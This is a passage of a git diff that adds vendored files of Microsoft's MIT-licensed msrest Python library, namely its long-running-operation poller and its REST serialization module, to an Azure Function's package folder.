b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/poller.py @@ -0,0 +1,237 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import threading +import time +import uuid +try: + from urlparse import urlparse +except ImportError: + from urllib.parse import urlparse + +from typing import Any, Callable, Union, List, Optional, TYPE_CHECKING + +if TYPE_CHECKING: + import requests + +from ..serialization import Model +from ..service_client import ServiceClient +from ..pipeline import ClientRawResponse + +class PollingMethod(object): + """ABC class for polling method. + """ + def initialize(self, client, initial_response, deserialization_callback): + # type: (Any, Any, Any) -> None + raise NotImplementedError("This method needs to be implemented") + + def run(self): + # type: () -> None + raise NotImplementedError("This method needs to be implemented") + + def status(self): + # type: () -> str + raise NotImplementedError("This method needs to be implemented") + + def finished(self): + # type: () -> bool + raise NotImplementedError("This method needs to be implemented") + + def resource(self): + # type: () -> Any + raise NotImplementedError("This method needs to be implemented") + +class NoPolling(PollingMethod): + """An empty poller that returns the deserialized initial response. + """ + def __init__(self): + self._initial_response = None + self._deserialization_callback = None + + def initialize(self, _, initial_response, deserialization_callback): + # type: (Any, requests.Response, Callable) -> None + self._initial_response = initial_response + self._deserialization_callback = deserialization_callback + + def run(self): + # type: () -> None + """Empty run, no polling. + """ + pass + + def status(self): + # type: () -> str + """Return the current status as a string. + :rtype: str + """ + return "succeeded" + + def finished(self): + # type: () -> bool + """Is this polling finished? + :rtype: bool + """ + return True + + def resource(self): + # type: () -> Any + return self._deserialization_callback(self._initial_response) + + +class LROPoller(object): + """Poller for long running operations. + + :param client: A msrest service client. Can be a SDK client and it will be casted to a ServiceClient. 
+ :type client: msrest.service_client.ServiceClient + :param initial_response: The initial call response + :type initial_response: requests.Response or msrest.pipeline.ClientRawResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. If a subclass of Model is given, this passes "deserialize" as callback. + :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: msrest.polling.PollingMethod + """ + + def __init__(self, client, initial_response, deserialization_callback, polling_method): + # type: (Any, Union[ClientRawResponse, requests.Response], Union[Model, Callable[[requests.Response], Model]], PollingMethod) -> None + try: + self._client = client if isinstance(client, ServiceClient) else client._client # type: ServiceClient + except AttributeError: + raise ValueError("Poller client parameter must be a low-level msrest Service Client or a SDK client.") + self._response = initial_response.response if isinstance(initial_response, ClientRawResponse) else initial_response + self._callbacks = [] # type: List[Callable] + self._polling_method = polling_method + + if isinstance(deserialization_callback, type) and issubclass(deserialization_callback, Model): + deserialization_callback = deserialization_callback.deserialize # type: ignore + + # Might raise a CloudError + self._polling_method.initialize(self._client, self._response, deserialization_callback) + + # Prepare thread execution + self._thread = None + self._done = None + self._exception = None + if not self._polling_method.finished(): + self._done = threading.Event() + self._thread = threading.Thread( + target=self._start, + name="LROPoller({})".format(uuid.uuid4())) + self._thread.daemon = True + self._thread.start() + + def _start(self): + """Start the long running operation. + On completion, runs any callbacks. + + :param callable update_cmd: The API request to check the status of + the operation. + """ + try: + self._polling_method.run() + except Exception as err: + self._exception = err + + finally: + self._done.set() + + callbacks, self._callbacks = self._callbacks, [] + while callbacks: + for call in callbacks: + call(self._polling_method) + callbacks, self._callbacks = self._callbacks, [] + + def status(self): + # type: () -> str + """Returns the current status string. + + :returns: The current status string + :rtype: str + """ + return self._polling_method.status() + + def result(self, timeout=None): + # type: (Optional[float]) -> Model + """Return the result of the long running operation, or + the result available after the specified timeout. + + :returns: The deserialized resource of the long running operation, + if one is available. + :raises CloudError: Server problem with the query. + """ + self.wait(timeout) + return self._polling_method.resource() + + def wait(self, timeout=None): + # type: (Optional[float]) -> None + """Wait on the long running operation for a specified length + of time. You can check if this call as ended with timeout with the + "done()" method. + + :param float timeout: Period of time to wait for the long running + operation to complete (in seconds). + :raises CloudError: Server problem with the query. 
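+
+        A short sketch (``poller`` is an assumed LROPoller instance)::
+
+            poller.wait(timeout=30)
+            if poller.done():
+                result = poller.result()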
+ """ + if self._thread is None: + return + self._thread.join(timeout=timeout) + try: + # Let's handle possible None in forgiveness here + raise self._exception # type: ignore + except TypeError: # Was None + pass + + def done(self): + # type: () -> bool + """Check status of the long running operation. + + :returns: 'True' if the process has completed, else 'False'. + """ + return self._thread is None or not self._thread.is_alive() + + def add_done_callback(self, func): + # type: (Callable) -> None + """Add callback function to be run once the long running operation + has completed - regardless of the status of the operation. + + :param callable func: Callback function that takes at least one + argument, a completed LongRunningOperation. + """ + # Still use "_done" and not "done", since CBs are executed inside the thread. + if self._done is None or self._done.is_set(): + func(self._polling_method) + # Let's add them still, for consistency (if you wish to access to it for some reasons) + self._callbacks.append(func) + + def remove_done_callback(self, func): + # type: (Callable) -> None + """Remove a callback from the long running operation. + + :param callable func: The function to be removed from the callbacks. + :raises: ValueError if the long running operation has already + completed. + """ + if self._done is None or self._done.is_set(): + raise ValueError("Process is complete.") + self._callbacks = [c for c in self._callbacks if c != func] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/py.typed new file mode 100644 index 0000000..e5aff4f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/py.typed @@ -0,0 +1 @@ +# Marker file for PEP 561. \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/serialization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/serialization.py new file mode 100644 index 0000000..11d4b6d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/serialization.py @@ -0,0 +1,1994 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+
+from base64 import b64decode, b64encode
+import calendar
+import datetime
+import decimal
+import email
+from enum import Enum
+import json
+import logging
+import re
+import sys
+try:
+    from urllib import quote  # type: ignore
+except ImportError:
+    from urllib.parse import quote  # type: ignore
+import xml.etree.ElementTree as ET
+
+import isodate
+
+from typing import Dict, Any
+
+from .exceptions import (
+    ValidationError,
+    SerializationError,
+    DeserializationError,
+    raise_with_traceback)
+
+try:
+    basestring  # type: ignore
+    unicode_str = unicode  # type: ignore
+except NameError:
+    basestring = str  # type: ignore
+    unicode_str = str  # type: ignore
+
+_LOGGER = logging.getLogger(__name__)
+
+try:
+    _long_type = long  # type: ignore
+except NameError:
+    _long_type = int
+
+class UTC(datetime.tzinfo):
+    """Time Zone info for handling UTC"""
+
+    def utcoffset(self, dt):
+        """UTC offset for UTC is 0."""
+        return datetime.timedelta(0)
+
+    def tzname(self, dt):
+        """Timestamp representation."""
+        return "Z"
+
+    def dst(self, dt):
+        """No daylight saving for UTC."""
+        return datetime.timedelta(0)
+
+try:
+    from datetime import timezone as _FixedOffset
+except ImportError:  # Python 2.7
+    class _FixedOffset(datetime.tzinfo):  # type: ignore
+        """Fixed offset in minutes east from UTC.
+        Copy/pasted from Python doc
+        :param datetime.timedelta offset: offset in timedelta format
+        """
+
+        def __init__(self, offset):
+            self.__offset = offset
+
+        def utcoffset(self, dt):
+            return self.__offset
+
+        def tzname(self, dt):
+            return str(self.__offset.total_seconds()/3600)
+
+        def __repr__(self):
+            return "<FixedOffset {}>".format(self.tzname(None))
+
+        def dst(self, dt):
+            return datetime.timedelta(0)
+
+        def __getinitargs__(self):
+            return (self.__offset,)
+
+try:
+    from datetime import timezone
+    TZ_UTC = timezone.utc  # type: ignore
+except ImportError:
+    TZ_UTC = UTC()  # type: ignore
+
+_FLATTEN = re.compile(r"(?<!\\)\.")
+
+# [... attribute key transformers and the Model base class elided ...]
+
+class Serializer(object):
+    """Request object model serializer."""
+
+    basic_types = {str: 'str', int: 'int', bool: 'bool', float: 'float'}
+
+    _xml_basic_types_serializers = {'bool': lambda x: str(x).lower()}
+
+    validation = {
+        "min_length": lambda x, y: len(x) < y,
+        "max_length": lambda x, y: len(x) > y,
+        "minimum": lambda x, y: x < y,
+        "maximum": lambda x, y: x > y,
+        "minimum_ex": lambda x, y: x <= y,
+        "maximum_ex": lambda x, y: x >= y,
+        "min_items": lambda x, y: len(x) < y,
+        "max_items": lambda x, y: len(x) > y,
+        "pattern": lambda x, y: not re.match(y, x, re.UNICODE),
+        "unique": lambda x, y: len(x) != len(set(x)),
+        "multiple": lambda x, y: x % y != 0
+    }
+
+    def __init__(self, classes=None):
+        self.serialize_type = {
+            'iso-8601': Serializer.serialize_iso,
+            'rfc-1123': Serializer.serialize_rfc,
+            'unix-time': Serializer.serialize_unix,
+            'duration': Serializer.serialize_duration,
+            'date': Serializer.serialize_date,
+            'time': Serializer.serialize_time,
+            'decimal': Serializer.serialize_decimal,
+            'long': Serializer.serialize_long,
+            'bytearray': Serializer.serialize_bytearray,
+            'base64': Serializer.serialize_base64,
+            'object': self.serialize_object,
+            '[]': self.serialize_iter,
+            '{}': self.serialize_dict
+        }
+        self.dependencies = dict(classes) if classes else {}
+        self.key_transformer = full_restapi_key_transformer
+        self.client_side_validation = True
+
+    def _serialize(self, target_obj, data_type=None, **kwargs):
+        """Serialize data into a string according to type.
+
+        :param target_obj: The data to be serialized.
+ :param str data_type: The type to be serialized from. + :rtype: str, dict + :raises: SerializationError if serialization fails. + """ + key_transformer = kwargs.get("key_transformer", self.key_transformer) + keep_readonly = kwargs.get("keep_readonly", False) + if target_obj is None: + return None + + attr_name = None + class_name = target_obj.__class__.__name__ + + if data_type: + return self.serialize_data( + target_obj, data_type, **kwargs) + + if not hasattr(target_obj, "_attribute_map"): + data_type = type(target_obj).__name__ + if data_type in self.basic_types.values(): + return self.serialize_data( + target_obj, data_type, **kwargs) + + # Force "is_xml" kwargs if we detect a XML model + try: + is_xml_model_serialization = kwargs["is_xml"] + except KeyError: + is_xml_model_serialization = kwargs.setdefault("is_xml", target_obj.is_xml_model()) + + serialized = {} + if is_xml_model_serialization: + serialized = target_obj._create_xml_node() + try: + attributes = target_obj._attribute_map + for attr, attr_desc in attributes.items(): + attr_name = attr + if not keep_readonly and target_obj._validation.get(attr_name, {}).get('readonly', False): + continue + + if attr_name == "additional_properties" and attr_desc["key"] == '': + if target_obj.additional_properties is not None: + serialized.update(target_obj.additional_properties) + continue + try: + ### Extract sub-data to serialize from model ### + orig_attr = getattr(target_obj, attr) + if is_xml_model_serialization: + pass # Don't provide "transformer" for XML for now. Keep "orig_attr" + else: # JSON + keys, orig_attr = key_transformer(attr, attr_desc.copy(), orig_attr) + keys = keys if isinstance(keys, list) else [keys] + + ### Serialize this data ### + kwargs["serialization_ctxt"] = attr_desc + new_attr = self.serialize_data(orig_attr, attr_desc['type'], **kwargs) + + ### Incorporate this data in the right place ### + if is_xml_model_serialization: + xml_desc = attr_desc.get('xml', {}) + xml_name = xml_desc.get('name', attr_desc['key']) + xml_prefix = xml_desc.get('prefix', None) + xml_ns = xml_desc.get('ns', None) + if xml_desc.get("attr", False): + if xml_ns: + ET.register_namespace(xml_prefix, xml_ns) + xml_name = "{{{}}}{}".format(xml_ns, xml_name) + serialized.set(xml_name, new_attr) + continue + if xml_desc.get("text", False): + serialized.text = new_attr + continue + if isinstance(new_attr, list): + serialized.extend(new_attr) + elif isinstance(new_attr, ET.Element): + # If the down XML has no XML/Name, we MUST replace the tag with the local tag. But keeping the namespaces. 
+ if 'name' not in getattr(orig_attr, '_xml_map', {}): + splitted_tag = new_attr.tag.split("}") + if len(splitted_tag) == 2: # Namespace + new_attr.tag = "}".join([splitted_tag[0], xml_name]) + else: + new_attr.tag = xml_name + serialized.append(new_attr) + else: # That's a basic type + # Integrate namespace if necessary + local_node = _create_xml_node( + xml_name, + xml_prefix, + xml_ns + ) + local_node.text = unicode_str(new_attr) + serialized.append(local_node) + else: # JSON + for k in reversed(keys): + unflattened = {k: new_attr} + new_attr = unflattened + + _new_attr = new_attr + _serialized = serialized + for k in keys: + if k not in _serialized: + _serialized.update(_new_attr) + _new_attr = _new_attr[k] + _serialized = _serialized[k] + except ValueError as err: + if isinstance(err, SerializationError): + raise err + continue + + except (AttributeError, KeyError, TypeError) as err: + msg = "Attribute {} in object {} cannot be serialized.\n{}".format( + attr_name, class_name, str(target_obj)) + raise_with_traceback(SerializationError, msg, err) + else: + return serialized + + def body(self, data, data_type, **kwargs): + """Serialize data intended for a request body. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :rtype: dict + :raises: SerializationError if serialization fails. + :raises: ValueError if data is None + """ + if data is None: + raise ValidationError("required", "body", True) + + # Just in case this is a dict + internal_data_type = data_type.strip('[]{}') + internal_data_type = self.dependencies.get(internal_data_type, None) + try: + is_xml_model_serialization = kwargs["is_xml"] + except KeyError: + if internal_data_type and issubclass(internal_data_type, Model): + is_xml_model_serialization = kwargs.setdefault("is_xml", internal_data_type.is_xml_model()) + else: + is_xml_model_serialization = False + if internal_data_type and not isinstance(internal_data_type, Enum): + try: + deserializer = Deserializer(self.dependencies) + # Since it's on serialization, it's almost sure that format is not JSON REST + # We're not able to deal with additional properties for now. + deserializer.additional_properties_detection = False + if is_xml_model_serialization: + deserializer.key_extractors = [ + attribute_key_case_insensitive_extractor, + ] + else: + deserializer.key_extractors = [ + rest_key_case_insensitive_extractor, + attribute_key_case_insensitive_extractor, + last_rest_key_case_insensitive_extractor + ] + data = deserializer._deserialize(data_type, data) + except DeserializationError as err: + raise_with_traceback( + SerializationError, "Unable to build a model: "+str(err), err) + + if self.client_side_validation: + errors = _recursive_validate(data_type, data_type, data) + if errors: + raise errors[0] + return self._serialize(data, data_type, **kwargs) + + def _http_component_validation(self, data, data_type, name, **kwargs): + if self.client_side_validation: + # https://github.com/Azure/msrest-for-python/issues/85 + if data is not None and data_type in self.basic_types.values(): + data = self.serialize_basic(data, data_type, **kwargs) + data = self.validate(data, name, required=True, **kwargs) + return data + + def url(self, name, data, data_type, **kwargs): + """Serialize data intended for a URL path. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :rtype: str + :raises: TypeError if serialization fails. 
+ :raises: ValueError if data is None + """ + data = self._http_component_validation(data, data_type, name, **kwargs) + try: + output = self.serialize_data(data, data_type, **kwargs) + if data_type == 'bool': + output = json.dumps(output) + + if kwargs.get('skip_quote') is True: + output = str(output) + else: + output = quote(str(output), safe='') + except SerializationError: + raise TypeError("{} must be type {}.".format(name, data_type)) + else: + return output + + def query(self, name, data, data_type, **kwargs): + """Serialize data intended for a URL query. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :rtype: str + :raises: TypeError if serialization fails. + :raises: ValueError if data is None + """ + data = self._http_component_validation(data, data_type, name, **kwargs) + try: + # Treat the list aside, since we don't want to encode the div separator + if data_type.startswith("["): + internal_data_type = data_type[1:-1] + data = [ + self.serialize_data(d, internal_data_type, **kwargs) if d is not None else "" + for d + in data + ] + if not kwargs.get('skip_quote', False): + data = [ + quote(str(d), safe='') + for d + in data + ] + return str(self.serialize_iter(data, internal_data_type, **kwargs)) + + # Not a list, regular serialization + output = self.serialize_data(data, data_type, **kwargs) + if data_type == 'bool': + output = json.dumps(output) + if kwargs.get('skip_quote') is True: + output = str(output) + else: + output = quote(str(output), safe='') + except SerializationError: + raise TypeError("{} must be type {}.".format(name, data_type)) + else: + return str(output) + + def header(self, name, data, data_type, **kwargs): + """Serialize data intended for a request header. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :rtype: str + :raises: TypeError if serialization fails. + :raises: ValueError if data is None + """ + data = self._http_component_validation(data, data_type, name, **kwargs) + try: + if data_type in ['[str]']: + data = ["" if d is None else d for d in data] + + output = self.serialize_data(data, data_type, **kwargs) + if data_type == 'bool': + output = json.dumps(output) + except SerializationError: + raise TypeError("{} must be type {}.".format(name, data_type)) + else: + return str(output) + + @classmethod + def validate(cls, data, name, **kwargs): + """Validate that a piece of data meets certain conditions""" + required = kwargs.get('required', False) + if required and data is None: + raise ValidationError("required", name, True) + elif data is None: + return + elif kwargs.get('readonly'): + return + + try: + for key, value in kwargs.items(): + validator = cls.validation.get(key, lambda x, y: False) + if validator(data, value): + raise ValidationError(key, name, value) + except TypeError: + raise ValidationError("unknown", name, "unknown") + else: + return data + + def serialize_data(self, data, data_type, **kwargs): + """Serialize generic data according to supplied data type. + + :param data: The data to be serialized. + :param str data_type: The type to be serialized from. + :param bool required: Whether it's essential that the data not be + empty or None + :raises: AttributeError if required data is None. + :raises: ValueError if data is None + :raises: SerializationError if serialization fails. 
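+
+        Illustrative examples (assuming a default Serializer())::
+
+            serializer = Serializer()
+            serializer.serialize_data([1, 2, 3], '[int]')  # -> [1, 2, 3]
+            serializer.serialize_data(True, 'bool')        # -> True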
+ """ + if data is None: + raise ValueError("No value for given attribute") + + try: + if data_type in self.basic_types.values(): + return self.serialize_basic(data, data_type, **kwargs) + + elif data_type in self.serialize_type: + return self.serialize_type[data_type](data, **kwargs) + + # If dependencies is empty, try with current data class + # It has to be a subclass of Enum anyway + enum_type = self.dependencies.get(data_type, data.__class__) + if issubclass(enum_type, Enum): + return Serializer.serialize_enum(data, enum_obj=enum_type) + + iter_type = data_type[0] + data_type[-1] + if iter_type in self.serialize_type: + return self.serialize_type[iter_type]( + data, data_type[1:-1], **kwargs) + + except (ValueError, TypeError) as err: + if (isinstance(err, SerializationError)): + raise err # don't rewrap as SerializationError + msg = "Unable to serialize value: {!r} as type: {!r}." + raise_with_traceback( + SerializationError, msg.format(data, data_type), err) + else: + return self._serialize(data, **kwargs) + + @classmethod + def _get_custom_serializers(cls, data_type, **kwargs): + custom_serializer = kwargs.get("basic_types_serializers", {}).get(data_type) + if custom_serializer: + return custom_serializer + if kwargs.get("is_xml", False): + return cls._xml_basic_types_serializers.get(data_type) + + @classmethod + def serialize_basic(cls, data, data_type, **kwargs): + """Serialize basic builting data type. + Serializes objects to str, int, float or bool. + + Possible kwargs: + - basic_types_serializers dict[str, callable] : If set, use the callable as serializer + - is_xml bool : If set, use xml_basic_types_serializers + + :param data: Object to be serialized. + :param str data_type: Type of object in the iterable. + """ + custom_serializer = cls._get_custom_serializers(data_type, **kwargs) + if custom_serializer: + return custom_serializer(data) + if data_type == 'str': + return cls.serialize_unicode(data) + return eval(data_type)(data) + + @classmethod + def serialize_unicode(cls, data): + """Special handling for serializing unicode strings in Py2. + Encode to UTF-8 if unicode, otherwise handle as a str. + + :param data: Object to be serialized. + :rtype: str + """ + try: # If I received an enum, return its value + return data.value + except AttributeError: + pass + + try: + if isinstance(data, unicode): + # Don't change it, JSON and XML ElementTree are totally able + # to serialize correctly u'' strings + return data + except NameError: + return str(data) + else: + return str(data) + + def serialize_iter(self, data, iter_type, div=None, **kwargs): + """Serialize iterable. + + Supported kwargs: + - serialization_ctxt dict : The current entry of _attribute_map, or same format. + serialization_ctxt['type'] should be same as data_type. + - is_xml bool : If set, serialize as XML + + :param list attr: Object to be serialized. + :param str iter_type: Type of object in the iterable. + :param bool required: Whether the objects in the iterable must + not be None or empty. + :param str div: If set, this str will be used to combine the elements + in the iterable into a combined string. Default is 'None'. 
+ :rtype: list, str + """ + if isinstance(data, str): + raise SerializationError("Refuse str type as a valid iter type.") + + serialization_ctxt = kwargs.get("serialization_ctxt", {}) + is_xml = kwargs.get("is_xml", False) + + serialized = [] + for d in data: + try: + serialized.append(self.serialize_data(d, iter_type, **kwargs)) + except ValueError as err: + if isinstance(err, SerializationError): + raise err + serialized.append(None) + + if div: + serialized = ['' if s is None else str(s) for s in serialized] + serialized = div.join(serialized) + + if 'xml' in serialization_ctxt or is_xml: + # XML serialization is more complicated + xml_desc = serialization_ctxt.get('xml', {}) + xml_name = xml_desc.get('name') + if not xml_name: + xml_name = serialization_ctxt['key'] + + # Create a wrap node if necessary (use the fact that Element and list have "append") + is_wrapped = xml_desc.get("wrapped", False) + node_name = xml_desc.get("itemsName", xml_name) + if is_wrapped: + final_result = _create_xml_node( + xml_name, + xml_desc.get('prefix', None), + xml_desc.get('ns', None) + ) + else: + final_result = [] + # All list elements to "local_node" + for el in serialized: + if isinstance(el, ET.Element): + el_node = el + else: + el_node = _create_xml_node( + node_name, + xml_desc.get('prefix', None), + xml_desc.get('ns', None) + ) + if el is not None: # Otherwise it writes "None" :-p + el_node.text = str(el) + final_result.append(el_node) + return final_result + return serialized + + def serialize_dict(self, attr, dict_type, **kwargs): + """Serialize a dictionary of objects. + + :param dict attr: Object to be serialized. + :param str dict_type: Type of object in the dictionary. + :param bool required: Whether the objects in the dictionary must + not be None or empty. + :rtype: dict + """ + serialization_ctxt = kwargs.get("serialization_ctxt", {}) + serialized = {} + for key, value in attr.items(): + try: + serialized[self.serialize_unicode(key)] = self.serialize_data( + value, dict_type, **kwargs) + except ValueError as err: + if isinstance(err, SerializationError): + raise err + serialized[self.serialize_unicode(key)] = None + + if 'xml' in serialization_ctxt: + # XML serialization is more complicated + xml_desc = serialization_ctxt['xml'] + xml_name = xml_desc['name'] + + final_result = _create_xml_node( + xml_name, + xml_desc.get('prefix', None), + xml_desc.get('ns', None) + ) + for key, value in serialized.items(): + ET.SubElement(final_result, key).text = value + return final_result + + return serialized + + def serialize_object(self, attr, **kwargs): + """Serialize a generic object. + This will be handled as a dictionary. If object passed in is not + a basic type (str, int, float, dict, list) it will simply be + cast to str. + + :param dict attr: Object to be serialized. 
+ :rtype: dict or str + """ + if attr is None: + return None + if isinstance(attr, ET.Element): + return attr + obj_type = type(attr) + if obj_type in self.basic_types: + return self.serialize_basic(attr, self.basic_types[obj_type], **kwargs) + if obj_type is _long_type: + return self.serialize_long(attr) + if obj_type is unicode_str: + return self.serialize_unicode(attr) + if obj_type is datetime.datetime: + return self.serialize_iso(attr) + if obj_type is datetime.date: + return self.serialize_date(attr) + if obj_type is datetime.time: + return self.serialize_time(attr) + if obj_type is datetime.timedelta: + return self.serialize_duration(attr) + if obj_type is decimal.Decimal: + return self.serialize_decimal(attr) + + # If it's a model or I know this dependency, serialize as a Model + elif obj_type in self.dependencies.values() or isinstance(attr, Model): + return self._serialize(attr) + + if obj_type == dict: + serialized = {} + for key, value in attr.items(): + try: + serialized[self.serialize_unicode(key)] = self.serialize_object( + value, **kwargs) + except ValueError: + serialized[self.serialize_unicode(key)] = None + return serialized + + if obj_type == list: + serialized = [] + for obj in attr: + try: + serialized.append(self.serialize_object( + obj, **kwargs)) + except ValueError: + pass + return serialized + return str(attr) + + @staticmethod + def serialize_enum(attr, enum_obj=None): + try: + result = attr.value + except AttributeError: + result = attr + try: + enum_obj(result) + return result + except ValueError: + for enum_value in enum_obj: + if enum_value.value.lower() == str(attr).lower(): + return enum_value.value + error = "{!r} is not valid value for enum {!r}" + raise SerializationError(error.format(attr, enum_obj)) + + @staticmethod + def serialize_bytearray(attr, **kwargs): + """Serialize bytearray into base-64 string. + + :param attr: Object to be serialized. + :rtype: str + """ + return b64encode(attr).decode() + + @staticmethod + def serialize_base64(attr, **kwargs): + """Serialize str into base-64 string. + + :param attr: Object to be serialized. + :rtype: str + """ + encoded = b64encode(attr).decode('ascii') + return encoded.strip('=').replace('+', '-').replace('/', '_') + + @staticmethod + def serialize_decimal(attr, **kwargs): + """Serialize Decimal object to float. + + :param attr: Object to be serialized. + :rtype: float + """ + return float(attr) + + @staticmethod + def serialize_long(attr, **kwargs): + """Serialize long (Py2) or int (Py3). + + :param attr: Object to be serialized. + :rtype: int/long + """ + return _long_type(attr) + + @staticmethod + def serialize_date(attr, **kwargs): + """Serialize Date object into ISO-8601 formatted string. + + :param Date attr: Object to be serialized. + :rtype: str + """ + if isinstance(attr, str): + attr = isodate.parse_date(attr) + t = "{:04}-{:02}-{:02}".format(attr.year, attr.month, attr.day) + return t + + @staticmethod + def serialize_time(attr, **kwargs): + """Serialize Time object into ISO-8601 formatted string. + + :param datetime.time attr: Object to be serialized. + :rtype: str + """ + if isinstance(attr, str): + attr = isodate.parse_time(attr) + t = "{:02}:{:02}:{:02}".format(attr.hour, attr.minute, attr.second) + if attr.microsecond: + t += ".{:02}".format(attr.microsecond) + return t + + @staticmethod + def serialize_duration(attr, **kwargs): + """Serialize TimeDelta object into ISO-8601 formatted string. + + :param TimeDelta attr: Object to be serialized. 
+ :rtype: str + """ + if isinstance(attr, str): + attr = isodate.parse_duration(attr) + return isodate.duration_isoformat(attr) + + @staticmethod + def serialize_rfc(attr, **kwargs): + """Serialize Datetime object into RFC-1123 formatted string. + + :param Datetime attr: Object to be serialized. + :rtype: str + :raises: TypeError if format invalid. + """ + try: + if not attr.tzinfo: + _LOGGER.warning( + "Datetime with no tzinfo will be considered UTC.") + utc = attr.utctimetuple() + except AttributeError: + raise TypeError("RFC1123 object must be valid Datetime object.") + + return "{}, {:02} {} {:04} {:02}:{:02}:{:02} GMT".format( + Serializer.days[utc.tm_wday], utc.tm_mday, + Serializer.months[utc.tm_mon], utc.tm_year, + utc.tm_hour, utc.tm_min, utc.tm_sec) + + @staticmethod + def serialize_iso(attr, **kwargs): + """Serialize Datetime object into ISO-8601 formatted string. + + :param Datetime attr: Object to be serialized. + :rtype: str + :raises: SerializationError if format invalid. + """ + if isinstance(attr, str): + attr = isodate.parse_datetime(attr) + try: + if not attr.tzinfo: + _LOGGER.warning( + "Datetime with no tzinfo will be considered UTC.") + utc = attr.utctimetuple() + if utc.tm_year > 9999 or utc.tm_year < 1: + raise OverflowError("Hit max or min date") + + microseconds = str(attr.microsecond).rjust(6,'0').rstrip('0').ljust(3, '0') + if microseconds: + microseconds = '.'+microseconds + date = "{:04}-{:02}-{:02}T{:02}:{:02}:{:02}".format( + utc.tm_year, utc.tm_mon, utc.tm_mday, + utc.tm_hour, utc.tm_min, utc.tm_sec) + return date + microseconds + 'Z' + except (ValueError, OverflowError) as err: + msg = "Unable to serialize datetime object." + raise_with_traceback(SerializationError, msg, err) + except AttributeError as err: + msg = "ISO-8601 object must be valid Datetime object." + raise_with_traceback(TypeError, msg, err) + + @staticmethod + def serialize_unix(attr, **kwargs): + """Serialize Datetime object into IntTime format. + This is represented as seconds. + + :param Datetime attr: Object to be serialized. + :rtype: int + :raises: SerializationError if format invalid + """ + if isinstance(attr, int): + return attr + try: + if not attr.tzinfo: + _LOGGER.warning( + "Datetime with no tzinfo will be considered UTC.") + return int(calendar.timegm(attr.utctimetuple())) + except AttributeError: + raise TypeError("Unix time object must be valid Datetime object.") + +def rest_key_extractor(attr, attr_desc, data): + key = attr_desc['key'] + working_data = data + + while '.' in key: + dict_keys = _FLATTEN.split(key) + if len(dict_keys) == 1: + key = _decode_attribute_map_key(dict_keys[0]) + break + working_key = _decode_attribute_map_key(dict_keys[0]) + working_data = working_data.get(working_key, data) + if working_data is None: + # If at any point while following flatten JSON path see None, it means + # that all properties under are None as well + # https://github.com/Azure/msrest-for-python/issues/197 + return None + key = '.'.join(dict_keys[1:]) + + return working_data.get(key) + +def rest_key_case_insensitive_extractor(attr, attr_desc, data): + key = attr_desc['key'] + working_data = data + + while '.' 
